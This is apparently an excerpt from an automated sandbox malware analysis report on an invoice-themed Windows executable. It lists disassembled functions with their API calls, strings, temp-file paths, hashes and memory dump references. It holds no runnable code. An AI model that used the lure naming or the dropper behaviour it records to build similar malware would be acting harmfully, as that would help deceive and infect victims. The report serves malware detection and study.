                                • Opcode Fuzzy Hash: 08e03463725da0ff3356c75dcc47c74515db929b364e39f49b974b501609e6cc
                                • Instruction Fuzzy Hash: 9AF0C032108618BBCA102EE7DC0CD57BE6CFBCB6FAB164215FE19D11A0C66768358771
                                Function 0040553B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(004211D0,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,004211D0,?,?,?,?,?), ref: 004055FA
                                • wsprintfW.USER32 ref: 00405607
                                • SetDlgItemTextW.USER32(?,004211D0), ref: 0040561E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: ItemTextlstrlenwsprintf
                                • String ID: %u.%u%s%s
                                • API String ID: 3540041739-3551169577
                                • Opcode ID: 1657763a395a501c771c527054f82eb2be7fb15598214c574ca57117f0c03a97
                                • Instruction ID: 55cf9957bdbe08eeb8051450228c2b429c3200e40720c4f5a9b0f695fa8f14cf
                                • Opcode Fuzzy Hash: 1657763a395a501c771c527054f82eb2be7fb15598214c574ca57117f0c03a97
                                • Instruction Fuzzy Hash: 902106737003142FD720A9799C81FAB7289CBC5364F01473EFE6AF71D1E979581885A5
                                Function 00401DBA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,?,?,?), ref: 00401E2C
                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00401E48
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: MessageSend$Timeout
                                • String ID: !
                                • API String ID: 1777923405-2657877971
                                • Opcode ID: 717c05464dbdde1d43877d7e05f7376ad78b7270f4b2221d83dfb1c24934849a
                                • Instruction ID: 49af8de353e46cf11236f791407a5cbcba9ae5af57995df827a2b81b7b260957
                                • Opcode Fuzzy Hash: 717c05464dbdde1d43877d7e05f7376ad78b7270f4b2221d83dfb1c24934849a
                                • Instruction Fuzzy Hash: 44212471209301AFE714AF21C846A2FBBE8EF84755F00093FF585A21E0C6B98D01CA5A
                                Function 6FA41F1E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28stringCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfW.USER32 ref: 6FA41F51
                                • lstrcpyW.KERNEL32(?,error,00001018,6FA41765,00000000,?), ref: 6FA41F71
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                • Associated: 00000000.00000002.2365714477.000000006FA40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366165712.000000006FA44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366228696.000000006FA46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6fa40000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: lstrcpywsprintf
                                • String ID: callback%d$error
                                • API String ID: 2408954437-1307476583
                                • Opcode ID: f9ac8c8f84acf38044569863ae81f794277bebc04df333182692e0fe2f316c7e
                                • Instruction ID: 8f553ee66189636e58165bc1ab03ef454144df990b79b6d8c80103dc969f67c7
                                • Opcode Fuzzy Hash: f9ac8c8f84acf38044569863ae81f794277bebc04df333182692e0fe2f316c7e
                                • Instruction Fuzzy Hash: E0F08C34208510AFD7098F08D949DBA73E5FFCA314F0981A9FD598B241C77DACA58BA1
                                Function 00406531 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403C9E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040399D), ref: 00406537
                                • CharPrevW.USER32(?,00000000), ref: 00406542
                                • lstrcatW.KERNEL32(?,004082B0), ref: 00406554
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406531
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: CharPrevlstrcatlstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 2659869361-823278215
                                • Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                • Instruction ID: cc5554a2ad12a3b2ce5c355aa705355a4eb5105ff62047e1dcc734cc64aad723
                                • Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                • Instruction Fuzzy Hash: B6D05E31102924AFC2026B58AE08D9B77ACFF46301301406EFAC2B3160CB745D5287ED
                                Function 6FA41CC7 Relevance: 6.2, APIs: 4, Instructions: 209COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2366121843.000000006FA41000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FA40000, based on PE: true
                                • Associated: 00000000.00000002.2365714477.000000006FA40000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366165712.000000006FA44000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000000.00000002.2366228696.000000006FA46000.00000002.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6fa40000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: FreeGlobal$__alldvrm
                                • String ID:
                                • API String ID: 482422042-0
                                • Opcode ID: 9fbb09e21cb7ce617f9da7de4dfc899b4ba62cd05e483e625aff33d22c58ac8e
                                • Instruction ID: b811714e93f6b1aac897e066b906590f1b8bc5415265a4dd61c372a7f22f98f9
                                • Opcode Fuzzy Hash: 9fbb09e21cb7ce617f9da7de4dfc899b4ba62cd05e483e625aff33d22c58ac8e
                                • Instruction Fuzzy Hash: 1F514BB57483058F93079E79CA8157A76E5BFCA304F184A2EE051C7280F7ADE8E64262
                                Function 0040285F Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll), ref: 004028B9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: lstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp$C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll
                                • API String ID: 1659193697-3377493597
                                • Opcode ID: 8dbcb2fd7b217228523bb32d9577dfde9e670be5aaf231835310540875a17a73
                                • Instruction ID: 87e4a89a1644b821f0af8cb1a7976e90618d12837afc66c1e862d8435416238a
                                • Opcode Fuzzy Hash: 8dbcb2fd7b217228523bb32d9577dfde9e670be5aaf231835310540875a17a73
                                • Instruction Fuzzy Hash: C7112676A543006BD310BB618A89A2BB7D4AF84314F11453FF545B31C1D7BC980687AF
                                Function 00402077 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D47
                                  • Part of subcall function 00405D15: lstrlenW.KERNEL32(?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D59
                                  • Part of subcall function 00405D15: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,?,00000000,?,?), ref: 00405D74
                                  • Part of subcall function 00405D15: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll), ref: 00405D8C
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00010432), ref: 00405DB3
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00010432,0000104D,00000000,?), ref: 00405DCE
                                  • Part of subcall function 00405D15: SendMessageW.USER32(00010432,00001013,00000000,00000000), ref: 00405DDB
                                  • Part of subcall function 004069CE: ShellExecuteExW.SHELL32(?), ref: 004069DD
                                  • Part of subcall function 004064EF: WaitForSingleObject.KERNEL32(?,00000064), ref: 004064F9
                                  • Part of subcall function 004064EF: GetExitCodeProcess.KERNEL32(?,?), ref: 00406523
                                • CloseHandle.KERNEL32(?,?), ref: 00402110
                                Strings
                                • @, xrefs: 004020F2
                                • C:\Users\user\AppData\Local\Temp\fanin\Leflet, xrefs: 004020D1
                                • C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll, xrefs: 00402098
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: MessageSend$lstrlen$CloseCodeExecuteExitHandleObjectProcessShellSingleTextWaitWindowlstrcat
                                • String ID: @$C:\Users\user\AppData\Local\Temp\fanin\Leflet$C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll
                                • API String ID: 4079680657-2337798114
                                • Opcode ID: b3f635e0ff2294aada5878f9b4cee8023eac3de101f72fe104a431beeca66540
                                • Instruction ID: 1a2f5228193f18700cea608b7af5492b6fd1c87105d587b586e39d0dc9a83391
                                • Opcode Fuzzy Hash: b3f635e0ff2294aada5878f9b4cee8023eac3de101f72fe104a431beeca66540
                                • Instruction Fuzzy Hash: 3C118C71A483809BC710AFA2C94561ABBE9BFC4745F40493EF595A72D1DBBC8805CB4A
                                Function 00403364 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                Download Yara Rule
                                APIs
                                • DestroyWindow.USER32(00000000,00403554), ref: 00403375
                                • GetTickCount.KERNEL32 ref: 00403394
                                • CreateDialogParamW.USER32(0000006F,00000000,0040362A,00000000), ref: 004033B3
                                • ShowWindow.USER32(00000000,00000005), ref: 004033C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                • String ID:
                                • API String ID: 2102729457-0
                                • Opcode ID: 4a7b031ca6bcbd07d04e4791083f97fcd863d0c0ea14b4434ac483fd79bb7cb0
                                • Instruction ID: 05fd0e373085f508408529d976a5f5643121ad856ee530bb797c10a8200a5ccc
                                • Opcode Fuzzy Hash: 4a7b031ca6bcbd07d04e4791083f97fcd863d0c0ea14b4434ac483fd79bb7cb0
                                • Instruction Fuzzy Hash: 2EF0F870651700EBEB209F60EF8DB1A3AA8B740B06F801979F941B51F0DFB89540CA5C
                                Function 004058AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45windowCOMMON
                                Download Yara Rule
                                APIs
                                • IsWindowVisible.USER32(?), ref: 004058DF
                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405927
                                  • Part of subcall function 004054C3: SendMessageW.USER32(0001042C,00000000,00000000,00000000), ref: 004054D5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Window$CallMessageProcSendVisible
                                • String ID:
                                • API String ID: 3748168415-3916222277
                                • Opcode ID: 2dca9501c208de8155b709c61fb4f4fee366092d07c020c7b33c5c4d6728830a
                                • Instruction ID: b1e338e3564b8c01f07b09259678d1708f9cc3666d75656fad75f4110972ebbf
                                • Opcode Fuzzy Hash: 2dca9501c208de8155b709c61fb4f4fee366092d07c020c7b33c5c4d6728830a
                                • Instruction Fuzzy Hash: 5401D472600619EBDF202F01DC04ADB3A25EB94768F004437F904B62E1C77989A29FED
                                Function 004061EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18windowCOMMON
                                Download Yara Rule
                                APIs
                                • DispatchMessageW.USER32(?), ref: 004061F6
                                • PeekMessageW.USER32(?,00000000,?,T5@,?), ref: 0040620A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: Message$DispatchPeek
                                • String ID: T5@
                                • API String ID: 1770753511-1075436632
                                • Opcode ID: 9cb97e42a766ea8cada08b0cc05ec87f5fef8c0c6a112fe8ce1f02b30d5e22d0
                                • Instruction ID: 9faa2b1bfb0e31a5f243467a4896c54f1023d1031c98b050ea5e6b6ce42c350d
                                • Opcode Fuzzy Hash: 9cb97e42a766ea8cada08b0cc05ec87f5fef8c0c6a112fe8ce1f02b30d5e22d0
                                • Instruction Fuzzy Hash: 89D0123190020DA7DF109FE0DD09F9A7B6D6B04744F008035B742A9091D679D1179B99
                                Function 00406CEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00403433,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe,80000000,00000003,?,?,?,?,?), ref: 00406CF1
                                • CharPrevW.USER32(80000000,00000000,?,?,?,?,?), ref: 00406D02
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2336578967.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.2336558529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336619495.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336648566.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2336802258.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: CharPrevlstrlen
                                • String ID: C:\Users\user\Desktop
                                • API String ID: 2709904686-1246513382
                                • Opcode ID: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                • Instruction ID: 4dbe35682b60e6d52269d03a3853e7a49c7dcb535e87d19da2916c46be0a3be3
                                • Opcode Fuzzy Hash: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                • Instruction Fuzzy Hash: EBD05E31015924DBD7526B18ED099AF7BB8EF0130030A846EE987E3160CB385C9187AD

                                Execution Graph

                                Execution Coverage:0%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:100%
                                Total number of Nodes:1
                                Total number of Limit Nodes:0
                                execution_graph 81953 32522b60 LdrInitializeThunk

                                Executed Functions

                                Function 325235C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 3 325235c0-325235cc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: c6ea1f0cf2ce66f8f133a202f58a1c26ebbf4764a97f593a29fee74ec1f072ef
                                • Instruction ID: 901f55cd631d95ff1acd2a401f06906f97f833eeec9581b60af63e1ade93d473
                                • Opcode Fuzzy Hash: c6ea1f0cf2ce66f8f133a202f58a1c26ebbf4764a97f593a29fee74ec1f072ef
                                • Instruction Fuzzy Hash: AF90023160650402D10571585618746115547D0211F69D412E1428528D87958B5575A2
                                Function 32522B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 32522b60-32522b6c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: f48765c973ee310d6f903f2fe99036f2adeb6038da7c0bcce74b4b3dfa842879
                                • Instruction ID: d09a84b34bc0d4ec528d12ebb2a41203fd24f572147d881b0132a542c1bf15e1
                                • Opcode Fuzzy Hash: f48765c973ee310d6f903f2fe99036f2adeb6038da7c0bcce74b4b3dfa842879
                                • Instruction Fuzzy Hash: 5890026120340003410A71585518756415A47E0211B59D022E2018550DC5258A957125
                                Function 32522C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1 32522c70-32522c7c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.2776586688.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                • Associated: 00000003.00000002.2776586688.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.2776586688.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
